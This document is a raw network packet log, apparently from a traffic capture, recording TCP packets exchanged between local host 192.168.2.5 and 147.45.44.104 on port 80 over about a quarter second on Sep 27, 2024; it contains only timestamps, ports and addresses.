Sep 27, 2024 00:15:11.476063967 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.476074934 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.476077080 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.476083994 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.476089001 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.476095915 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.476108074 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.476119995 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.476130962 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.476136923 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.476136923 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.476216078 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.476216078 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.476322889 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.476334095 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.476345062 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.476355076 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.476388931 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.476401091 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.476412058 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.476423025 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.476433992 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.476444960 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.476455927 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.476475954 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.476475954 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.476475954 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.476475954 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.476475954 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.476491928 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.476607084 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.476619959 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.476632118 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.476643085 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.476720095 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.476731062 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.476742029 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.476754904 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.476764917 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.476777077 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.476787090 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.476799011 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.476808071 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.476808071 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.476808071 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.476808071 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.476808071 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.476808071 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.476808071 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.476927042 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.476927042 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.477202892 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.477214098 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.477225065 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.477236032 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.477247000 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.477255106 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.477257967 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.477268934 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.477278948 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.477291107 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.477297068 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.477297068 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.477300882 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.477312088 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.477323055 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.477334023 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.477344990 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.477344990 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.477344990 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.477358103 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.477449894 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.477449894 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.477449894 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.477454901 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.477468014 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.477478027 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.477488995 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.477499962 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.477513075 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.477555037 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.477555037 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.477555990 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.477555990 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.477638960 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.477650881 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.477662086 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.477674007 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.477684975 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.477685928 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.477745056 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.477745056 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.580010891 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580039024 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580050945 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580061913 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580071926 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580087900 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580100060 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580110073 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.580110073 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.580112934 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580123901 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580135107 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580143929 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580154896 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580166101 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580176115 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580177069 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.580185890 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580197096 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.580198050 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580209017 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580209970 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.580225945 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580238104 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580245018 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.580249071 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580260038 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580271006 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580281973 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580281973 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.580281973 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.580295086 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580307961 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580317020 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.580317020 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.580324888 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580368996 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.580374956 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580379009 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.580385923 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580396891 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580408096 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580420017 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580429077 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580439091 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580450058 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580455065 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.580455065 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.580461979 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580481052 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.580481052 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.580580950 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580619097 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.580619097 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.580660105 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580672026 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580682039 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580693007 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580703020 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580713987 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580724955 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580750942 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.580750942 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.580750942 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.580768108 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.580782890 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580827951 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.580847979 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580858946 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580869913 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580881119 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.580907106 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.580907106 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.581094980 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.581114054 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.581125975 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.581135988 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.581229925 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.581229925 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.581309080 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.581331968 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.581342936 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.581403017 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.581403971 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.581403971 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.582835913 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.582847118 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.582853079 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.582864046 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.582874060 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.582936049 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.582936049 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.583019972 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.583030939 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.583041906 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.583106995 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.583106995 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.583193064 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.583204031 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.583235025 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.583375931 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.583380938 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.583393097 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.583404064 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.583421946 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.583434105 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.583441973 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.583441973 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.583446980 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.583561897 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.583574057 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.583575964 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.583575964 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.583585024 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.583626986 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.583628893 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.583628893 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.583638906 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.583650112 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.583659887 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.583671093 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.583682060 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.583683968 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.583683968 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.583683968 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.583743095 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.583743095 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.583770037 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.583853960 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.583858013 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.583868980 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.583878994 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.583889961 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.583901882 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.583935976 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.583935976 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.583935976 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.584001064 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.584012985 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.584047079 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.584065914 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.584180117 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.584192038 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.584203005 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.584213972 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.584222078 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.584224939 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.584235907 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.584247112 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.584248066 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.584259033 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.584270000 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.584281921 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.584291935 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.584291935 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.584311962 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.584311962 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.584336042 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.584347963 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.584357977 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.584389925 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.584408045 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.584541082 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.584552050 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.584563971 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.584574938 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.584588051 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.584709883 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.584721088 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.584732056 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.584742069 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.584749937 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.584749937 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.584749937 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.584749937 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.584753990 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.584764957 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.584774971 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.584852934 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.584852934 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.584852934 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.584882021 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.584892988 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.584903955 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.584914923 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.584918022 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.584924936 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.584939957 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.584954023 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.585057974 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.585078001 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.585089922 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.585100889 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.585110903 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.585122108 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.585124016 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.585124016 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.585134029 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.585153103 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.585201979 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.704320908 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.704340935 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.704354048 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.704375029 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.704386950 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.704399109 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.704411030 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.704484940 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.704499006 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.704510927 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.704524994 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.704539061 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.704561949 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.704561949 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.704561949 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.704561949 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.704579115 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.704587936 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.704591036 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.704602003 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.704684019 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.704684019 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.705215931 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.705229998 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.705241919 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.705252886 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.705265999 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.705285072 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.705285072 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.705296993 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.705300093 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.705307961 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.705319881 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.705332041 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.705343962 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.705346107 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.705346107 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.705354929 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.705440998 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.705441952 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.705441952 CEST	49709	80	192.168.2.5	147.45.44.104
